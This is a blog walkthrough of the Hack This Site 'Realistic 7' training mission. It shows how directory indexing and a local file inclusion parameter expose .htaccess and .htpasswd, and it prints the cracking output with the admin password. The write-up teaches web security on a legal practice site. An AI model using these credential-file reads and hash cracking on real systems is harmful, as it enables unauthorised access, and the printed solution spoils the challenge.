What is it? @.@

Here is the place where I record some tactics about wargame, systems, and other security issues.


Hack This Site! - Realistic 7

What's Right For America
A homophobic hate group is spreading their conservative propaganda of blind obedience and bigoted war mongering. Help tolerance activists take over their website of ignorance and discrimination. 

Level 7
From: FreedomOfChoice 

Message: Friend of freedom and liberty, I invite you to take a look at the hate speech being spewed over the web at http://www.hackthissite.org/missions/realistic/7/. It's so funny that conservatives keep saying they want to protect the values of America - freedom, tolerance, and democracy - but when it comes to personal choices like private marijuana use or same-sex marriages, they damn them to burn in eternal hell and send them to jail.
This is a personal freedom issue. No one else is hurt if two consenting adults decide to marry. But people who claim to have the moral high ground decide to ruin it for everyone else and discriminate against same-sex couples. To think that they are talking about making a constitutional amendment to STOP OUR FREEDOM TO MARRY is ludicrous. This injustice must be stopped.
There is an admin section on that website somewhere, perhaps hidden among their directory structure. It would be a great fight against moral tyranny and a victory for freedom if you could somehow hack into their website. Thank you.
  1. Take a tour of the website.
  2. Since the hint: "There is an admin section on that website somewhere, perhaps hidden among their directory structure." told us there is a directory named "admin", maybe we can use "directory indexing" to discover what is inside the website.
  3. And if you had observed the URLs of the website, you could find out that the content of the website was displayed by using file inclusion which means there existed a Remote/Local File Inclusion (also known as RFI/LFI) vulnerability.
    Reference: http://en.wikipedia.org/wiki/Remote_file_inclusion
    Vul: hxxp://www.hackthissite.org/missions/realistic/7/showimages.php?file=patriot.txt
    Vul: hxxp://www.hackthissite.org/missions/realistic/7/showimages.php?file=bush.txt
    Vul: hxxp://www.hackthissite.org/missions/realistic/7/showimages.php?file=war.txt
  4. Let's check the files. There are a few image links like below.
    Link: hxxp://www.hackthissite.org/missions/realistic/7/war.txt

  5. Let's do directory indexing with the "images" directory, then you'll find the "admin" directory.
    Link: hxxp://www.hackthissite.org/missions/realistic/7/images/

  6. Visit URL: hxxp://www.hackthissite.org/missions/realistic/7/images/admin/ , it will ask you to do HTTP authentication.
    Reference: http://en.wikipedia.org/wiki/Basic_access_authentication
  7. Intuitively, let us use LFI to discover the content of the .htaccess file.
    Reference: http://en.wikipedia.org/wiki/Htaccess

  8. Then, you will find the source code like below.
    <center><a href="AuthName "Administration Access"
    "><img src="AuthName "Administration Access"
    " width=100></a> <a href="AuthType Basic
    "><img src="AuthType Basic
    " width=100></a> <a href="AuthUserFile /usr/local/www/hackthissite.org/html/missions/realistic/7/images/admin/.htpasswd
    "><img src="AuthUserFile /usr/local/www/hackthissite.org/html/missions/realistic/7/images/admin/.htpasswd
    " width=100></a> <a href="require valid-user
    "><img src="require valid-user
    " width=100></a> <a href=""><img src="" width=100></a> </center>
  9. Let's check the file named ".htpasswd".
    Reference: http://en.wikipedia.org/wiki/.htpasswd

  10. Here is what we want.
  11. I use "john the ripper" to crack it.
    Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 4x])
    shadow           (administrator)
  12. Good Job, OOXXOOXX, You have sucessfully completed Mission 7.